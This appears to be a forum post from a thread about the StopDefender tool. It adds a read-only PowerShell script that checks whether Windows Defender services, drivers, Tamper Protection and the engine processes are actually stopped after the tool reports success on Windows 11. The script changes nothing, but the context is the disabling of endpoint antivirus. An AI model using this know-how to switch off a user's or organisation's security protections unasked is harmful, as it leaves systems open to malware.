    alorsnon MDL Novice

    Jul 7, 2010
    32
    8
    0
    It's OK with Windows 10, but with Windows 11 the message says success but the WinDefend service is never stopped.
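
    Added example, not from the thread or from the StopDefender tool: a verification script for the outcome that posts #14 and #15 say the GUI and the tool's own "success" message get wrong. It reads the state of the seven names from the header in post #2 from the Service Control Manager (Win32_Service for the user-mode services, Win32_SystemDriver for WdBoot, WdFilter and WdNisDrv, which Get-Service does not list), asks the Defender status provider whether Tamper Protection and real-time protection are still on, and looks for the engine processes MsMpEng.exe and NisSrv.exe. It assumes an elevated PowerShell on Windows 10/11 with the Defender module (Get-MpComputerStatus) present; the function names are my own.

```powershell
# Added example: verify what actually happened to Defender instead of trusting
# the GUI (not code from the thread or the tool). Assumes an elevated PowerShell
# on Windows 10/11 with the Defender module available.
#Requires -RunAsAdministrator

# Names taken from the header file in post #2.
$DefenderNames = 'Sense', 'WdBoot', 'WdFilter', 'Wscsvc', 'WinDefend', 'WdNisSvc', 'WdNisDrv'

function Get-DefenderComponentState {
    # Get-Service lists only Win32 services; WdBoot, WdFilter and WdNisDrv are kernel
    # drivers exposed through Win32_SystemDriver, so both classes are queried.
    foreach ($name in $DefenderNames) {
        $svc = Get-CimInstance Win32_Service      -Filter "Name='$name'" -ErrorAction SilentlyContinue
        $drv = Get-CimInstance Win32_SystemDriver -Filter "Name='$name'" -ErrorAction SilentlyContinue
        if ($svc)     { $kind = 'Service'; $obj = $svc }
        elseif ($drv) { $kind = 'Driver';  $obj = $drv }
        else          { $kind = 'Missing'; $obj = $null }
        $state = '-'; $mode = '-'; $procId = '-'
        if ($obj) { $state = $obj.State; $mode = $obj.StartMode }
        if ($svc) { $procId = $svc.ProcessId }
        [pscustomobject]@{ Name = $name; Kind = $kind; State = $state; StartMode = $mode; ProcessId = $procId }
    }
}

function Get-DefenderProtectionState {
    # Get-MpComputerStatus talks to the Defender WMI provider; when the platform is
    # fully disabled the call itself fails, which is reported rather than read as "off".
    # IsTamperProtected is the setting posts #7 and #14 say has to be off for a stop to work.
    try {
        $s = Get-MpComputerStatus -ErrorAction Stop
        [pscustomobject]@{
            TamperProtection   = $s.IsTamperProtected
            AMServiceEnabled   = $s.AMServiceEnabled
            AntivirusEnabled   = $s.AntivirusEnabled
            RealTimeProtection = $s.RealTimeProtectionEnabled
            BehaviorMonitor    = $s.BehaviorMonitorEnabled
            OnAccessProtection = $s.OnAccessProtectionEnabled
        }
    }
    catch {
        [pscustomobject]@{ Error = "Get-MpComputerStatus failed: $($_.Exception.Message)" }
    }
}

function Get-DefenderEngineProcess {
    # MsMpEng.exe is the WinDefend engine and NisSrv.exe the WdNisSvc process; a live
    # MsMpEng beside a "stopped" WinDefend is the contradiction post #15 describes.
    Get-Process -Name MsMpEng, NisSrv -ErrorAction SilentlyContinue |
        Select-Object Id, ProcessName
}

Get-DefenderComponentState  | Format-Table -AutoSize
Get-DefenderProtectionState | Format-List
Get-DefenderEngineProcess   | Format-Table -AutoSize
```

    Run it before and after the tool and diff the two outputs: WinDefend showing State Running with a ProcessId, or MsMpEng.exe still listed, means the service was not stopped whatever the tool printed, and a TamperProtection value of True explains why on the builds where the stop fails.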